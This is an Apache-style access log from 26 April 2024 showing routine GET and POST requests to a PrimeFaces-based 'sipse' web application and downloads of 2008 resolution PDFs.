186.80.88.32 - - [26/Apr/2024:07:12:19 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
186.80.88.32 - - [26/Apr/2024:07:12:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.88.32 - - [26/Apr/2024:07:12:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.88.32 - - [26/Apr/2024:07:12:19 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.88.32 - - [26/Apr/2024:07:12:19 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.88.32 - - [26/Apr/2024:07:12:19 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
186.80.88.32 - - [26/Apr/2024:07:12:19 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 200 27209
3.224.220.101 - - [26/Apr/2024:07:12:20 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0935.pdf HTTP/1.1" 200 70010
181.154.118.29 - - [26/Apr/2024:07:12:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 33818
181.154.118.29 - - [26/Apr/2024:07:12:20 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 33814
181.154.118.29 - - [26/Apr/2024:07:12:21 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 33818
181.154.118.29 - - [26/Apr/2024:07:12:22 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 2675
23.22.35.162 - - [26/Apr/2024:07:12:24 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202008/0934.pdf HTTP/1.1" 200 590452
181.154.118.29 - - [26/Apr/2024:07:12:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultar.xhtml HTTP/1.1" 200 40403
181.154.118.29 - - [26/Apr/2024:07:12:24 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:12:24 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:12:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:12:24 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:12:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:12:25 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:12:25 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.154.118.29 - - [26/Apr/2024:07:12:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 33680
